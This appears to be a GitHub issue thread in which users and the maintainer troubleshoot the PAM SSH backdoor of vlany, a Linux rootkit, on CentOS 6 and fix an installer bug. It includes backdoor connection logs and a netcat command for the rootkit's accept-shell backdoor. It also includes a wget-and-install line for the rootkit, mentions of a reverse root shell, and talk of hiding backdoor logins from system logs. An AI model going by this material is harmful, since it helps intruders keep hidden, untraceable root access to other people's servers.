Unable to authentificate using the PAM backdoor on CentOS 6.x

[bogdanstoica35]

I have succesfully installed vlany on a clean centos box (a kvm vps), centos 6.8 x64 distro with the latest updates (the minimal install). Nothing else is running on that vps since is was specifically created to test your rootkit.

I am using sh ssh.sh username localhost port (it connects to the sshd daemon to the backdoor ssh port specified during rootkit install). But the user/pass combination always fails.

Any help would be really appreciated!

Keep developing this really nice rootkit!

[unixfox]

Already reported here: https://github.com/mempodippy/vlany/issues/5#issuecomment-261387093

[mempodippy]

Apologies. Will look at version changes more in-depth tomorrow. Only went on small assumptions. :/ unixfox, the issue still stands... I do have a solution to fix the problem, but there is a better solution than an easy fix which I would rather choose over the prior option. I'll see what happens... Will resolve this small mistake on my behalf tomorrow.

[bogdanstoica35]

Thank you. Is there other method to remotely connect to a server where the rk was installed except for the ssh? I mean like connectin from my linux box to the server? Also when using the ssh backdoor port are there any logs saved?

[bogdanstoica35]

Btw until the ssh/pam backdoor is fixed, how can I connect to the the sever where the rk was installed using netcat supposing low port is 10000 and high port is 10004 (that was configured during rk install)

Thanks again!

[bogdanstoica35]

Not sure if you have changed anything in the rootkit but know the error changed (I have used the latest version from github a new fresh centos 6 vps minimal install)

root@pve1:/opt# ./ssh.sh bogdan 172.16.100.50 8197 Connecting to PAM backdoor @ host 172.16.100.50 on hidden PAM port 8197 as sweed29 Press enter to continue sweed29@172.16.100.50's password: sweed29@172.16.100.50's password: Failed to connect. bind probably still alive - wait a minute and try again.

I thought is good to share this information with you.

PS: How do I connect using netcat to get a shell?

[mempodippy]

The bug might actually be fixed. I ran into this bug a couple of times using ssh.sh to connect, but could connect without it, suggesting ssh.sh is the perpetrator in this situation.. I'd always fix it locally and forget to update it on the repo. Pull the latest commit and try again.

If you can install a web server (shouldn't be done in a real situation if there's not already one installed) and use the snodew backdoor, it will give you a reverse root shell assuming suid bins aren't disabled on the box. The accept backdoor doesn't work in most situations. Since the accept backdoor is somewhat deprecated, I'd like to only work on the accept backdoor if it's absolutely vital - but in time I probably will make updates and improvements to it. nc -p [source_port] [host] [service port] Of course, add the --ssl flag if you installed the backdoor to go through SSL.

Edit: I'm working on my own local version, and I'm making significant changes to it. Said changes are mostly optimisation, couple of changes to hooks and functions, may just resolve and improve the accept backdoor while I'm doing that.

[bogdanstoica35]

root@pve1:/opt# sh ssh.sh sweed29 172.16.100.51 8197 Connecting to PAM backdoor @ host 172.16.100.51 on hidden PAM port 8197 as sweed29 Press enter to continuessh.sh: 15: read: arg count root@pve1:/opt# sweed29@172.16.100.51's password: Permission denied, please try again. sweed29@172.16.100.51's password: Permission denied, please try again. sweed29@172.16.100.51's password: Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

For some reason now it tries to login using the private key. I have checked and I have no private key generated for that user on my local box and user sweed29 does not actually exist on the remote box (where to rootkit is installed).

I have managed to connect using the nc -p 10000 host 22 (there is no web server installed) but that shell seems to be limited to just a few commands. So I really think that a working ssh backdoor is the way to go.

Thank you for all your efforts. Maybe I am not doing something right but it's still not working.

I have spinned a new clean centos 6.8 minimal install vm and got the source from git, and installed (I have destroyed the previous vm).

[unixfox]

@bogdanstoica35 It isn't trying to authenticate using private key, the listing at the end (Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password)) is just the authentications methods available for your openssh server.

@mempodippy Did you tried to install vlany on CentOS 5.11 because it doesn't want to install because of this error:

Traceback (most recent call last):
  File "config.py", line 11, in ?
    print "Usage: {0} <install> <lib name> <xattr 1> <xattr 2> <username> <plaintext password> <pam port> <ssl backdoor status> <accept shell password> <low> <high> <execve password> <environ var> <ptrace bug status>".format(sys.argv[0])
AttributeError: 'str' object has no attribute 'format'
Configuration failed. Exiting.

I think it's because the python version of CentOS 5 is a bit old (Python 2.4.3 (#1, Jan 9 2013, 06:47:03)) and str.format is available since python 2.6 (http://stackoverflow.com/a/792745/4297304).

[mempodippy]

That's annoying... Will update a fix to that problem soon.

[unixfox]

@mempodippy I fixed the issue (https://github.com/mempodippy/vlany/pull/14), I'm currently testing if vlany is working fine on CentOS 5.11.

[unixfox]

It fails on Configuration failed. Exiting. without additional errors, really strange... I think it get stuck with the config.py program. PS: I'm using the config.py with my fix.

[mempodippy]

config.py uses str.format very frequently, especially when setting up const.h. It'll take about 5-10 minutes to replace the uses of str.format with the older compatible method of formatting strings, it just looks nasty lol.. unixfox, give me a second, check email. :smile:

[unixfox]

@mempodippy There are so many lol, I'll try convert them tomorrow (it's 1am UTC+1 for me) because it fails too with a quick try (https://github.com/mempodippy/vlany/pull/14/commits/5a7d3009b0a167567d9cb354348e4a0fee866f82).

[mempodippy]

Appreciated, and it's quite late here too. Will be up later so I'll probably catch up on small changes and work on my local version a bit.

[bogdanstoica35]

Yeah well, in the end it is still not working on centos 6. Can authenticate via the ssh backdoor! I will try on a fresh centos installed, re-install vlany and see if it works or not. I'll keep you posted!

[bogdanstoica35]

After a new fresh install, this is the result:

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534 Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29 Press enter to continue sweed29@172.16.100.54's password: Failed to connect. bind probably still alive - wait a minute and try again. root@pve1:/opt#

The previous errors are gone. Am I doing something wrong?!

PS: Is it an issue that the centos vm is an lxc container in fact? I can spin a kvm vm if necessary...

[bogdanstoica35]

On the vm where the rootkit is installed:

Jan 15 04:40:54 centos sshd[1226]: Server listening on 0.0.0.0 port 22. Jan 15 04:42:51 centos sshd[1226]: error: accept: Software caused connection abort Jan 15 04:42:54 centos sshd[1237]: error: fcntl(5, F_GETFL, 0): Bad file descriptor Jan 15 04:43:38 centos sshd[1226]: error: accept: Software caused connection abort Jan 15 04:43:39 centos sshd[1242]: error: fcntl(6, F_GETFL, 0): Bad file descriptor Jan 15 04:44:45 centos sshd[1246]: Invalid user sweed29 from 172.16.100.1 Jan 15 04:44:45 centos sshd[1247]: input_userauth_request: invalid user sweed29 Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.16.100.1 Jan 15 04:44:50 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2 Jan 15 04:44:53 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown Jan 15 04:44:55 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2

On the server where ssh.sh is and after waiting for about 2-3 minutes

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534 Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29 Press enter to continue sweed29@172.16.100.54's password: sweed29@172.16.100.54's password: sweed29@172.16.100.54's password: Failed to connect. bind probably still alive - wait a minute and try again.

Wasn't it supposed to hide the connections on the backdoor? Like not showing the login in the logs?!

[unixfox]

The failed connections are logged because it's by default in the openssh server. Only successful connections are hidden from the logs. I'll try on a fresh CentOS 6 (KVM) install if I can reproduce the bug.

EDIT: There is a bug at the install, it's caused by my commit (https://github.com/mempodippy/vlany/pull/14), you can temporally use a old version of vlany (this was in WIP work in progress but @mempodippy merged the commits) :

wget https://github.com/mempodippy/vlany/archive/6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c.zip -O vlany.zip && unzip vlany.zip && cd vlany-6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c && ./install.sh

EDIT²: I can reproduce the bug reported by @bogdanstoica35.

[bogdanstoica35]

So it is not related to a lxc container, the behavior is the same on both lxc vm snd kvm vm

[bogdanstoica35]

Any updates on this?!

[unixfox]

I'll resolve my issue when I'll have some time because currently I'm busy. For the PAM backdoor bug, @mempodippy will take a look at it when he'll have free time I think.

[mempodippy]

Sorry, I've been very busy. In the next few days or so I'm going to push a significant update. While doing so I'll attempt to fix the PAM backdoor bug. If a fix isn't pushed in the same commit, then it'll be pushed after. Apologies. Edit: Expect a push whenever. Been busy the past couple of weeks with some school stuff... It'll only get worse too.

[bogdanstoica35]

I am still unable to login via ssh using the backdoor username. I can login with a real regular user or root account though. Is there anyway that the connections to ssh using the backdoor port to be not logged at all? I mean the way I see it, that's the purpose of a rootkit right? To be able to connect to a server without anyone being able to see you connected or any trace to appear in the server's logs...

[unixfox]

@mempodippy didn't pushed since a long time so that's normal that the bug isn't resolved. And for hiding failed attempts to the backdoor it's possible by removing all logs from the special user used for ssh but this isn't really useful because if the login is successful the log will be already removed. PS: I just wanted to remind you that vlany is I think a research project & in active development and not fully designed to be installed on a compromised critical machine.

[mempodippy]

There's a disclaimer in the README. Refer to that.

[bogdanstoica35]

I am pretty aware about what vlany is and I have also had read the Readme file. I thought that testing or suggesting features or any other stuff like this would be helpfull for the improvement or the development of vlany. Nothing else!

[mempodippy]

It is helpful, thank you. I just need to make myself some time.

[bogdanstoica35]

Any news?

[mempodippy]

I'm moving, will have more time after that. However my current local version has new function additions & optimization, owner shell tweaking, some changes to the library constructor & destructor, changes to hooks & config, and some other minor things. But... is very unstable. Everything has been thrown in without compiling the new changes, so once I'm satisfied with all the changes, I'll see what needs fixed. Would rather keep this slightly managed version of vlany on the repository. I will push an update soon. Sorry.